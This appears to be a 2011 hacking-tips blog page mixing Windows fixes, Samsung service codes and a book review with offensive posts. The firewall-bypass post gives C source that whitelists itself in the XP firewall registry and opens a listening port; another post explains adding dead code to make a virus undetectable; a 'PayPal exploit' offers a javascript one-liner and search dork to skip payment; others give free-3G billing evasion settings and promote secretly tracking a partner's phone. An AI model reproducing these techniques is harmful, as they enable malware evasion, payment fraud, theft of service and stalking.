helozzzzzz everyone ..

Here u can get some internet or OS tricks , pc and windows problems solutions••••

Hope u will like that••••


Search This Blog

Wednesday, June 22, 2011

How To Fix svchost.exe Constant High CPU Usage


svchost provides a shared service process on Windows computers allowing a number of services to run under it in-order to reduce resource consumption, while this approach is smart saving system resources this makes diagnosing and rectifying issues tough as you need to dig out the exact service running under svchost.exe process causing issues.
One of the most common issue with svchost.exe is it consuming constant high CPU usage in background, the same issue occurred on my computer where svchost.exe was constantly using 40% processor cycles in computer idle position on my 4 Core CPU. The solution to this involved identifying the culprit service running behind this process and disabling it as demonstrated after the jump.
svchost.exe is a generic host process name for services that run from dynamic-link libraries and any one of these underlying dll's/services can be the cause of constant background CPU usage, here is how to identify the problematic service and disabling it on Microsoft Windows 7:
Switch to "CPU" tab in "Resource Monitor" and click svchost.exe row, As we can see the bottom pane now shows "UPnP Device Host" eating-up CPU cycles in this case.

We can now right-click the service and stop it from here only or launch services.msc mmc panel to disable it all together.


As you can see now the CPU usage is now back to normal.






Sunday, June 19, 2011

ALL SAMSUNG SECRET CODS NEW



This post is an collection of numerous secret codes for samsung mobiles.they perform a wide variety of functions like imei checking,software version etc.

* *#06# Shows IMEI number of your mobile.
* *#9999# Show software version of mobile.
* *#0001# Display RS232 serial communication parameter setup
* *#8999*228# Display battery capacity and temperature / voltage
* *#8999*523# Adjust display contrast
* *#8999*636# Display storage capacity
* *#8999*778# Display SIM card information
* *#8999*324# The network checkout (engineering model)
* *#8999*289# Ringtone test
* *#8999*364# Display Watchdog state
* *#8999*427# WATCHDOG signal route setup
* *#8999*842# Vibrate test
* *#8999*782# Show date and alarm clock
* *#8999*246# Show the memory capacity
* *#8999*786# The display during warning
* *#8999*837# Samsung hardware version
* *#8999*377# Software error LOG (wrong display of EEPROM)
* *#8999*638# Show network information

hope these samsung secret codes are useful to you.if you know any other tricks pls post a comment to let others know.

Trace your friends mobile number live for free



TRACE YOUR GIRLFRIENDS Or FRIENDS MOBILE LIVE FOR FREE INSTANTLY



TRACE AND SPY YOUR GIRLFRIENDS MOBILE LIVE FOR FREE INSTANTLY

hack mobile to track trace anyones mobile without gps with gps for free ,trace wife girl friend child hack trace

TRACE ANYONES MOBILE INSTANTLY WITH GPS & WITHOUT GPS FOR FREE

Yes Guys, this is now possible...I m not jokingMany of us think that this is not possible or we have to spend some money for such services but believe me that we don’t have to spend any money for getting this done. Yes, PhoneOnMap makes it possible, which provides a free application that has to be installed in GPS cell phone and you are ready to track the phone from anywhere on the Internet.



This application can be useful for office work as well as family members. You can track your child as well as your girlfrend/wife too (LOL) . This PhoneOnMap can be used worldwide and you can use it while travelling too. The data is stored on the company’s server for a period of one month. This can be an invaluable source for sales and marketting department of an organization to track the marketing agents.



If you are worried about the security and privacy of the service, let me tell that it is very secure and your cell phone can not be monitored by any Unauthorized User as in order to access the tracking system, you have to authenticate yourself through a personal code which was used as identification while installingapplication on cell phone.



Features of GPS cell phone tracking system :-
1. GPS cell phone tracker and locater will not work in the underground transportation .



2. The application does not work when the phone is turned off.



3. The data transmission outside provider’s coverage area will add roaming charges like any other phone service charge us .



4. Once application is uninstalled from cell phone than you can’t do anything .



5. On internet tracking system will show cell phone location between every 10 seconds to 10 minutes , which is depend on setting .



Accordng to me this kind of service is very important for parents to track their children and from a business usage point of view an invaluable part of companies involved in supply and delvery system like Courrier and Home delivery system. This will help them to get a realtime location of the object and provide an accurate timeframe for the delivery.



As of now this service does not provide the exact pin point location but the location determined s in the range of 10-20 meters. However with little intelligence the exact location can be easily determined especially when you wish to track your children or the cheating girlfrend…(lol)



http://www.phoneonmap.com/en/

Wednesday, June 8, 2011

Free Unlimited 3G Service on Tata Docomo

Hello Friends,
Are you tired of using the low speed 2G service? I know your answer is ‘YES’. We all want to lay our hands on the latest high speed 3G service which gives a  download speed of 500 kbps to 1000 kbps. Today I will show a trick using which you can use unlimited 3G service for free.

Requirements

  1. Tata Docomo SIM Card with a balance of more than Rs. 1
  2. 3G enabled cellphone

Steps

  1. Create New Access Point Using Below Configuration and restart your cellphone.
    • Name : Tata Docomo or any
    • Access Point ( APN ) – tata.docomo.dive.in
    • Homepage : www.google.com or any
    • Proxy : 202.87.41.147
    • Proxy Port : 8080
    • Username : leave blank
    • Password : leave blank
  2. Download Operamini 4.2 Handler Browser
  3. Open your Opera mini handler and do the following changes in the Setiings:
    • Set Divein Settings as Default Settings For Opera Mini
    • Set http in Custom Field in your Opera Mini handler
    • Set Socket Server to http://203.115.112.5.server4.operamini.com ORhttp://10.124.72.171.server4.operamini.com
    • Keep Proxy Type as blank (Don’t Enter Anything in Proxy Server Field)
  4. Done!! Now use your free unlimited 3G service. Enjoy!!


Monday, June 6, 2011

How to Bypass Windows XP Firewall



This techniques is nothing but the vulnerability found in windows-xp sp2 firewall.


Windows XP Firewall Bypassing (Registry Based) :- Microsoft Windows XP SP2 comes bundled with a Firewall. Direct access to Firewall's registry keys allow local attackers to bypass the Firewall blocking list and allow malicious program to connect the network.


Vulnerable Systems :-
* Microsoft Windows XP SP2
Windows XP SP2 Firewall has list of allowed program in registry which are not properly protected from modification by a malicious local attacker.If an attacker adds a new key to the registry address of  
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List
 the attacker can enable his malware or Trojan to connect to the Internet without the Firewall triggering a warning.

Proof of Concept :-
Launch the regedit.exe program and access the keys found under the following path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List

Add an entry key such as this one:
Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat

Source Code :-

#include <*stdio.h*>
#include <*windows.h*> 

#include <*ezsocket.h*> 

#include <*conio.h*> 

#include "Shlwapi.h" 

int main( int argc, char *argv [] )
{
char buffer[1024];
char filename[1024];

HKEY hKey;
int i;
 

GetModuleFileName(NULL, filename, 1024); 

strcpy(buffer, filename);
strcat(buffer, ":*:Enabled:");
strcat(buffer, "bugg");
 

RegOpenKeyEx( 

HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services" "\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile" "\\AuthorizedApplications\\List",
0,
KEY_ALL_ACCESS,
&hKey);
 

RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));

int temp, sockfd, new_fd, fd_size;
 

struct sockaddr_in remote_addr;

fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");
fprintf(stdout, " This is not trojan \n");
fprintf(stdout, " Opened port is :2001 \n");
fprintf(stdout, "author:Adnan Anjum\n");
fprintf(stdout, "Dedicated to hackguide4u \n");
 

sleep(3); 

if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
return 0;
 

for (; ; )
{
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in);
 

if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
{
perror("accept");
continue;
}
temp = send(new_fd, "Hello Pakistan\r\n", strlen("Hello
Pakistan\r\n"), 0);
fprintf(stdout, "Sended: Hello 
Pakistan\r\n");
temp = recv(new_fd, buffer, 1024, 0);
buffer[temp] = '\0';
fprintf(stdout, "Recieved: %s\r\n", buffer);
ezclose_socket(new_fd);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
 

if (!strcmp(buffer, "quit"))
break;
}
 

ezsocket_exit();
return 0;
}
 

/* EoF */
Remove ** from the header files... easier to understand...Here we are just manipulating registry values using this program...

How does Antivirus software works or detects virus


Hello friends, today i will explain you all how an anti-virus software works and detects virus. Most of you already know that what is anti-virus, but have you ever tried to understand how it works and why it requires updates regularly? How anti-virus searches for viruses and detects the virus in the file and eliminates it or heal it. Working of anti-virus involves two basic technologies namely:
1. Dictionary based continuous and fragmented string search
2. Suspicious activity detection (process manipulation)

Dictionary based continuous and fragmented string Search:

As the technique's name suggest, as dictionary signifies virus definitions database that is regularly updated as soon as new virus is being found (that is found by second technique). In dictionary based search technique, anti-virus softwaresearches a string by comparing the file with strings existing in virus definition's or database.
 Now consider an hypothetical example for better understanding, suppose you have a file whose code is something like below:
ABCDEFGHIJKLMNOPQRSTUVWXYZ
Now when a virus infects a file what it does it manipulates the original file and adds some extra code or functionality to it so that the behavior of file  changes that means that defers from its normal functioning. So after virus infection file becomes something like this:
ABCDEFGHIJKLMNOPQRSTUVWXYZ012345
where 012345 is the string that virus has attached to the file after infection.
Now what does anti-virus database contains is that 012345 string . It matches the string in database with string in program or code and if it matches it identifies it as a virus.
Note: This all processing is done on binary format of codes and sometimes executable. 
Only if you manipulate the virus string that is 012345 and add some dead code between that something like below:
0a1a2a3a4a5a that means what we have done is added a between virus string but attached it in such a way that a does not affects the processing of string(virus). That means we have made new virus as this string is not there in the anti-virus database so it is not detected by anti-virus.
How can you add dead code, consider this string only 0a1a2a3a5a , read the character one by one and whenever character 'a' is found just skip the processing else concatenate the string and store that in new variable and use that variable in further processing of the code. This is how we makes any virus undetectable.
Note: But suspicious activity technique might detect this way as functionality of virus string is same.

That's the main reason why anti-virus needs updates regularly. Anti-virus companiesdaily adds new detected strings to their database so that the user can remain secure.

We can also bypass this using crypters too but as we are elite hackers and not script kiddies so i love to do this by manual editing rather than doing it by tools. Because if you do it using tools you will never come to know how its happening. And the day crypter becomes detectable your virus also becomes detectable. So friends i will recommend you that never depend on tools for hacking for two reasons:
1. You will never come to know the real scenario that what is happening in real time that means no knowledge. When the tool become detectable then you are noob again.
2. Most tools available are already infected with key-loggers and spy Trojans that inspect your system and send personal credentials to hackers who has created them.

Suspicious activity detection:


The most effective method to detect any malfunctioning in your system as it does not based of any search techniques rather it depends on the behavior of programs and files that how they act while they are executed or running. In this technique what happens is that anti-virus identifies the normal behavior of the file or program that what it should do when it is run without infection. Now if any file or program do any illegal processing like manipulating windows files integrity and protection then anti-virus identifies that file as virus and terminate that program and process related to it. That's the only reason why it detects patches and key-gens  as virus, as they try to manipulate the files by disassembling their integrity. 
The main drawback of this technique is that its quite annoying as sometimes it detects normal files as virus too but if you want to keep your PC safe then you need to do what your anti-virus suggests.
Also note one more thing, 99% patches and key-gens that you use to crack softwares are already infected with Trojans which are identity theft programs that steals your personal information and send them hackers. Some patches also contains back-doors that make your system open for attack similar to the way you have left your house main gate open for thieves in night....:P but its truth... 

So what is the lesson you have got from this article stop using pirated softwares and cracks to patch them otherwise you can be in great trouble. Solution for this is simple use trusted free wares as alternatives for paid tools rather than using their cracked versions..

Sunday, June 5, 2011

BT4 Assuring Security by Penetration Testing


f you are working in the “information security” field, you must know the BackTrackdistribution (otherwise you must be an alien coming from a far away planet!). If you search for the word “backtrack” on Amazon, you will find lot of references but only one book is fully dedicated to the Linux distribution: “BackTrack 4: Assuring Security by Penetration Testing“. I received a copy directly from the publisher and here is my review.

Just for those who are not familiar with BackTrack, it’s a Linux distribution made by security professionals for security professionals: It contains hundreds of tools to perform security assessments and penetration tests. Some of them are well-known like Metasploit, WebScarab or sqlmap and others are real gems (example: ua-testerwhich was added recently) and  increase the quality of the toolbox version after version.
Even if BackTrack 5 was released a few weeks ago, it does not reduce the book quality. There are so many tools that a single volume is not enough to cover all of them.The following chapters covered the classic penetration testing schema:
  • Target scoping
  • Information gathering
  • Target discovery
  • Enumerating target
  • Vulnerability mapping
  • Social engineering
  • Target exploitation
  • Privilege escalation
  • Maintaining access
  • Documentation and reporting
Each chapter reviews the most interesting tools (according to the authors) to achieve the chapter topic. Tools are briefly explained with examples. Straight to the point!
So, who’s need this book? The author’s goal is certainly not to give recipes on “how to hack a website“. The book must been see as a reference for those who already know the BackTrack distribution or who want to learn it. Don’t forget: this is just a toolbox, it does not prevent you to use your brain!

Free Paypal "buy now" [Exploit]

This is a Simple bit of JavaScript that can bypass payments, the site's need to be sites like these:

http://livewebbanners.com/learn.shtml
or
http://www.tallentagency.com/YouTubeClone/index.htm

How to use it:
Copy the code (Below)
Go to the page that you'r doing it on
Paste the link you copied into the URL and it should start.


Code:
javascript:top.location=document.getElementsByName('return')[0].value; javascript:void(0);

Hope this really help's you and you save a bit off $ $


Another tip:

To find these site's Google - "this order button requires a javascript enabled browser"

Type that in the "quotes" into google.